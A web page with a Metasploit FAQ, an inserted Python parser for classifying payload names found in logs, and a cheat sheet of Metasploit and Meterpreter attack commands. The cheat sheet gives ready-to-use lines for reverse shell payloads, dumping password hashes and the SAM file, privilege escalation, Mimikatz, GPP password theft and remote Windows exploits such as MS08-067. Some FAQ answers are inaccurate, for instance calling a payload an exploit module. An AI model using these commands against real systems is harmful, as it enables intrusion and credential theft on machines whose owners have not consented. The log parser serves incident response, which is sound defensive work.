What is Metasploit?

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

Is Metasploit Framework free?

It is a free and open source network security tool notable for its contributions to red team collaboration allowing for shared sessions, data, and communication through a single Metasploit instance.

Is Metasploit a Virus?

Metasploit is a hacking tool. Such tools are not viruses by nature, but they are considered dangerous to the victims of attacks.

Can I use Metasploit on Windows?

The Metasploit Framework requires administrative rights to install on Windows; by default it installs in the c:\metasploit folder. The AV on your Windows machine will generate alerts when you install and use Metasploit, so make sure to create the proper exceptions.

Does Metasploit have GUI?

msfgui is the Metasploit Framework Graphical User Interface. It provides the easiest way to use Metasploit, whether running locally or connecting remotely, build payloads, launch exploits, control sessions, and keep track of activity as you penetration test or just learn about security.

Do hackers use Kali Linux?

Yes, many hackers use Kali Linux, but it is not the only OS used by hackers. Kali Linux is used by hackers because it is a free OS and has over 600 tools for penetration testing and security analytics. Kali follows an open-source model: all the code is available on Git and may be tweaked.

What is Windows Meterpreter Reverse_tcp?

The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps.

What is a Metasploit payload?

Payloads, in simple terms, are simple scripts that hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system.

How does Metasploit payload work?

When the payload is executed, Metasploit creates a listener on the correct port, and then establishes a connection to the target SMB service. Behind the scenes, when the target SMB service receives the connection, a function is invoked which contains a stack buffer that the attacking machine will overflow.

What is payload in Kali?

A payload in Metasploit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. Whether or not a payload is staged is represented by '/' in the payload name.
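Added example (not from the original page or the Metasploit project): a small Python parser that applies this naming rule to payload names found in a console log or resource script, which helps when triaging such artifacts during incident response. The QUALIFIERS list, the function names and the sample log are assumptions made for illustration.

```python
import re
from typing import NamedTuple, Optional

# Assumption: partial list of segments that qualify the platform (architecture
# or sub-platform) instead of naming a stage; extend it for your environment.
QUALIFIERS = {"x86", "x64", "armle", "aarch64", "mipsle", "mipsbe", "unix", "windows"}
SET_PAYLOAD = re.compile(r"\bset\s+payload\s+([\w/]+)", re.IGNORECASE)

class PayloadInfo(NamedTuple):
    name: str
    platform: str
    qualifier: Optional[str]
    staged: bool
    stage: Optional[str]  # what runs after staging, e.g. meterpreter
    transport: str        # the stager (staged) or the whole single
    direction: str        # reverse, bind or unknown

def classify(name: str) -> PayloadInfo:
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    qualifier = None
    if len(rest) > 1 and rest[0] in QUALIFIERS:
        qualifier, rest = rest[0], rest[1:]
    if len(rest) == 1:    # single: one self-contained component
        staged, stage, transport = False, None, rest[0]
    elif len(rest) == 2:  # staged: <stage>/<stager>
        staged, stage, transport = True, rest[0], rest[1]
    else:
        raise ValueError(f"unexpected layout: {name!r}")
    words = transport.split("_")
    direction = "reverse" if "reverse" in words else "bind" if "bind" in words else "unknown"
    return PayloadInfo(name, platform, qualifier, staged, stage, transport, direction)

def payloads_in_log(text: str) -> list[PayloadInfo]:
    """Classify every `set payload ...` command in a console log or resource script."""
    return [classify(m.group(1)) for m in SET_PAYLOAD.finditer(text)]

# Constructed sample log; the first three payload names are the ones on this page.
SAMPLE_LOG = """\
msf6 > set payload windows/meterpreter/reverse_tcp
set payload windows/vncinject/reverse_tcp
set PAYLOAD linux/meterpreter/reverse_tcp
set payload windows/x64/meterpreter_reverse_tcp
"""
```

A staged result means the target fetches a second stage over the connection, and a reverse direction means the connection leaves the target, so egress logs are the place to look.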

List of Metasploit Commands – Cheat sheet

List of Metasploit Commands, Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp
set ViewOnly false | Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload

List of Metasploit Commands, Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\\windows | Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target
execute -f c:\\windows\\temp\\exploit.exe | Meterpreter run .exe on target, handy for executing uploaded exploits
execute -f cmd -c | Creates new channel with cmd shell
ps | Meterpreter show processes
shell | Meterpreter get shell on the target
getsystem | Meterpreter attempts privilege escalation on the target
hashdump | Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target | Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target | Meterpreter delete port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi | MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ | MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac | Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxiliary Metasploit Modules

use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version | Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell | Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privs | Metasploit show privileges of current user
use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords
load mimikatz -> wdigest | Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to

